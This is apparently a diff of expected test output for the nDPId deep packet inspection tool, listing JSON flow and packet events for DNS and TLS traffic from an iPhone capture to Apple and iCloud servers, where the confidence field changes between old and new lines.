+00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454598759,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454598759,"pkt":"xGGLNYKpxiwDYGpkCABFAADQatgAAEARieLAqAIBwKgCEQA1wtgAvFoLcEmBgAABAAQAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAJGQAmCGluaXQtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAABEeABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAbAARfZRg1"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADjlzEAAEARXXbAqAIBwKgCEQA10BgAz2vgCAuBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMPAAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOnACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXwAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAPAARce00awJMAAQABAAAADwAEXHtNQA=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADGO68AAEARuRXAqAIBwKgCEQA19D4AssJtjeyBgAABAAQAAAAAA2NsNAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAD1IAJQdjbDQtY2RuDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADAKwAFAAEAAABkABgDY2w1BWFwcGxlA2NvbQdlZGdla2V5wEvAXAAFAAEAABGWABoGZTE0ODY4BWRzY2U5CmFrYW1haWVkZ2XAS8CAAAEAAQAAAA8ABGhJPR4="} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454598885,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598885,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4434AAEABEeTAqAIRwKgCAQMDBHsAAAAARQAAz8hDAABAESx4wKgCAcCoAhEANfeRALsAAA=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454598886,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4zMkAAEABKJnAqAIRwKgCAQMDKS0AAAAARQAAz3UJAABAEX+ywKgCAcCoAhEANdLfALsAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454598886,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4CTAAAEAB7DLAqAIRwKgCAQMDOTMAAAAARQAA0GrYAABAEYniwKgCAcCoAhEANcLYALwAAA=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 